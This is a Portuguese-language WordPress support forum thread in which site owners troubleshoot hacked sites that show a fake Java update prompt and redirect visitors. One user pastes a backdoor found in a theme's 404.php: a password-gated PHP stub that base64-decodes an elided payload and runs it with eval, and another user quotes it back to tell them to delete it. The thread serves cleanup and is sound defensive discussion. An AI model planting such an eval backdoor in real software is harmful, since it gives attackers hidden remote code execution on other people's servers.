Olá @tcpengenhariacivil,
Acessei agora o site e pareceu tudo normal. Conseguiu resolver o problema? Se sim, não esqueça de voltar aqui e dizer como fez e marcar seu tópico como resolvido. Assim você ajuda outras pessoas que podem chegar por aqui com problemas parecidos.
Boa tarde!
Após criar este tópico, não tomei nenhuma atitude além das que mencionei acima, o problema simplesmente sumiu em questão de dias. Não sei o que pode ter acontecido, talvez um malware no servidor que tenha sido eliminado pelo próprio WordPress. De qualquer forma, agradeço pela atenção!
Boa tarde!
Ao acessar o seu site http:/www./tcpengenhariacivil.com.br/, ainda aparece a janela de solicitação do Java.
No site aqui da empresa também aparece a mesma coisa. O endereço é o http://www.harasseteflechas.com.br/
Sabem dizer se isso é algum tipo de vírus, ou é do Java mesmo?
Estou com o mesmo problema, estou verificando neste momento se teve algum arquivo malicioso no ftp
Bom dia!
Alguma novidade?
Oi @tcpengenhariacivil,
Acabei de tentar acessar o tcpengenhariacivil.com.br e fui redirecionado para outro site. Se você tem acesso ao painel do WordPress instale um plugin chamado WordFence e rode seu “scan”, muito provavelmente ele foi infectado.
Além disso veja se você está com o WordPress, plugins e temas atualizados, troque sua senha de FTP e dos usuários administradores.
Eu não consegui resolver o meu site ainda, mostra a mensagem da atualização do java, paguei todos arquivos que me pareceram estranhos, instalei o plugin sucuri, o wordfence e nada ainda de solução, estou procurando no banco algum vestigio
Também estou com o mesmo problema no meu site. Rodei WordFence, antivírus da hospedagem, excluí plugins e nenhuma solução.
Alguém tem alguma novidade?
ACHEI A SOLUÇÃO !!!! UHU o código criptografado esta dentro do arquivo 404.php do seu tema. Eu usei o plugin “Anti-Malware Security and Brute-Force Firewall”
Oi @haroldotiberio
Usei o plugin que comentaste e não encontrei nada.
Tem certeza de que o arquivo era esse?
O meu site já está sem ele e o problema persiste. :/
Sim, foi este plugin e meu diretorio e arquivo é esse: /www/wp-content/themes/oceanwp/404.php
No meu 404.php, aparece tudo isso abaixo. Haroldo, o que você fez?
<?php
if (isset($_GET[‘page’]))
{
if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
{
$ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;
$ecd = base64_decode($ec);
eval($ecd);
die();
}
}
?>
<?php
/**
* The template for displaying 404 pages (Not Found)
*
* @package WordPress
* @subpackage Twenty_Fourteen
* @since Twenty Fourteen 1.0
*/
get_header(); ?>
<div id=”primary” class=”content-area”>
<div id=”content” class=”site-content” role=”main”>
<header class=”page-header”>
<h1 class=”page-title”><?php _e( ‘Not Found’, ‘twentyfourteen’ ); ?></h1>
</header>
<div class=”page-content”>
<p><?php _e( ‘It looks like nothing was found at this location. Maybe try a search?’, ‘twentyfourteen’ ); ?></p>
<?php get_search_form(); ?>
</div><!– .page-content –>
</div><!– #content –>
</div><!– #primary –>
<?php
get_sidebar( ‘content’ );
get_sidebar();
get_footer();
Ai esta o hack cara kkk!!!
Apaga tudo isso:
<?php
if (isset($_GET[‘page’]))
{
if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
{
$ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;
$ecd = base64_decode($ec);
eval($ecd);
die();
}
}
?>
Pessoal, voltou o problema, não sei mais o que fazer, não encontrei ainda onde ta essa m****…
-
Esta resposta foi modificada 6 anos, 8 meses atrás por Felipe Elia. Razão: retirado um palavrão
Também esgotei todas as minhas alternativas e não consegui solucionar o problema.
Já que esse tópico aparece como “resolvido”, abri um novo aqui: https://br.wordpress.org/support/topic/atualizacao-obrigatoria-de-seguranca-do-java/